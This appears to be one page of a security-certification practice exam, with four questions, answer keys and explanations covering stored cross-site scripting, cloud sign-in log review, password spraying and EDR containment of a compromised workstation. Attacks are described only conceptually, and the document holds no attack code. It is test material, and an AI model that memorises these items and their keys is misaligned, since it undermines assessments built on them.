A web application lets users save a profile "display name." One employee enters a value that contains script code, and later other users who view that profile start seeing pop-ups and redirects to a fake login page. Which attack is most likely occurring?

A.SQL injection, because the database is being queried with unsafe concatenated input.
B.Cross-site scripting, because untrusted content is executed in another user's browser context.
C.Cross-site request forgery, because the attacker is forcing the victim to submit a form automatically.
D.Broken authentication, because the login system is failing to verify usernames correctly.
AnswerB

Cross-site scripting occurs when attacker-supplied input is rendered as active script, allowing redirects, pop-ups, and credential theft in other users' sessions.

Why this answer

Option B is correct because the employee's display name containing script code is stored in the database and later rendered in the browsers of other users without proper sanitization. This is a classic stored cross-site scripting (XSS) attack, where untrusted user input is executed as HTML/JavaScript in the context of another user's session, leading to pop-ups and redirects to a fake login page.

Exam trap

The trap here is that candidates may confuse stored XSS with SQL injection because both involve database storage, but the key distinction is that XSS executes client-side scripts in another user's browser, whereas SQL injection manipulates server-side queries.

How to eliminate wrong answers

Option A is wrong because SQL injection involves manipulating database queries through unsafe concatenation of input, but the described behavior (pop-ups and redirects in other users' browsers) is a client-side script execution, not a server-side database manipulation. Option C is wrong because cross-site request forgery (CSRF) forces a victim to submit a forged request, but the attack here involves script execution in the browser, not unauthorized form submissions. Option D is wrong because broken authentication refers to flaws in login verification or session management, whereas the issue is that untrusted content is executed in the browser, not that authentication is bypassed.

673
Multi-Selectmedium

A SIEM alert shows a successful sign-in to a cloud admin portal from an unusual country, followed by mailbox forwarding-rule changes four minutes later. Which two log sources should the analyst review first to confirm whether the account was abused? Select two.

Select 2 answers
A.Identity provider and MFA authentication logs for the account session
B.Cloud application audit logs for mailbox and rule changes
C.Printer spooler logs from the user’s workstation
D.DHCP lease logs for the office network
E.USB device connection logs from the user’s laptop
AnswersA, B

These logs show whether the sign-in was legitimate, challenged, or bypassed by a compromised session.

Why this answer

Option A is correct because the identity provider (IdP) logs will show the authentication method used (e.g., SAML, OIDC) and the MFA logs will confirm whether a valid second factor was presented. If the sign-in succeeded without MFA or with a compromised token, it indicates account takeover. These logs are the first place to verify the legitimacy of the session.

Exam trap

The trap here is that candidates may focus on network-level logs (DHCP, printer) because they associate 'unusual country' with network location, but the question specifically requires logs that directly capture authentication events and mailbox rule changes in the cloud.

674
MCQmedium

A SIEM correlates VPN logs and sees the same public IP make one failed login attempt against 56 different user accounts over 25 minutes. The usernames vary, but the password value appears to be the same in each attempt. Ten minutes later, one of those accounts authenticates successfully from the same IP, and no password-reset events are recorded. Which attack pattern is most likely?

A.Password spraying against multiple accounts with a shared password guess.
B.A brute-force attack focused on a single account with repeated rapid guesses.
C.A replay attack using captured authentication traffic from a previous session.
D.Credential stuffing using known breached username and password pairs.
AnswerA

This pattern matches password spraying because the attacker tries one common password across many usernames to avoid lockouts and reduce noisy failures. The same source IP, low failure count per account, and eventual success on one account are classic clues. Analysts should treat the successful login as potentially compromised and review related authentication, MFA, and session activity immediately.

Why this answer

The SIEM logs show the same public IP attempting to authenticate with 56 different usernames using the same password. This is the hallmark of a password spraying attack, where an attacker tries a single common password against many accounts to avoid account lockout policies. The subsequent successful authentication from the same IP, without a password reset, confirms the guessed password was valid for one account.

Exam trap

The trap here is that candidates confuse password spraying with brute-force attacks, failing to recognize that the key differentiator is the single password used against multiple accounts versus multiple passwords against a single account.

How to eliminate wrong answers

Option B is wrong because a brute-force attack focuses on a single account with many rapid password guesses, not a single password against many accounts. Option C is wrong because a replay attack would reuse captured authentication tokens or hashes from a previous session, not attempt login with a plaintext password across multiple usernames.

675
Multi-Selecthard

EDR reports that a workstation launched PowerShell from a word processor, created a scheduled task named WinUpdateSvc, and began making repeated HTTPS connections to a rare external domain. The user is still logged in to several cloud apps. Which two response actions are best to initiate from the EDR console? Select two.

Select 2 answers
A.Isolate the endpoint from the network to stop further communication and lateral movement.
B.Collect an EDR triage package or memory-focused artifact before powering the device off.
C.Delete the scheduled task immediately so the host returns to normal operation.
D.Reimage the workstation from the golden image as the first response.
E.Ignore the alert because the PowerShell binary is built into Windows and therefore safe.
AnswersA, B

Isolation is the fastest way to contain a compromised endpoint when the device is still active. It prevents additional command-and-control traffic, reduces the chance of lateral movement, and can be done without immediately shutting down the machine. This is the primary EDR containment action in a live incident.

Why this answer

Option A is correct because isolating the endpoint from the network immediately stops the active HTTPS command-and-control (C2) communication and prevents lateral movement to other systems. Given the suspicious chain (word processor spawning PowerShell, creating a scheduled task, and connecting to a rare external domain), this is a strong indicator of a malware infection or unauthorized remote access. Isolation preserves the forensic state while cutting off the attacker's access.

Exam trap

The trap here is that candidates may think deleting the scheduled task (Option C) is sufficient to remediate, but the exam emphasizes that removing artifacts without addressing the root cause is ineffective, and that isolation and forensic collection are the correct first steps in incident response.

Page 8

Page 9 of 16

Page 10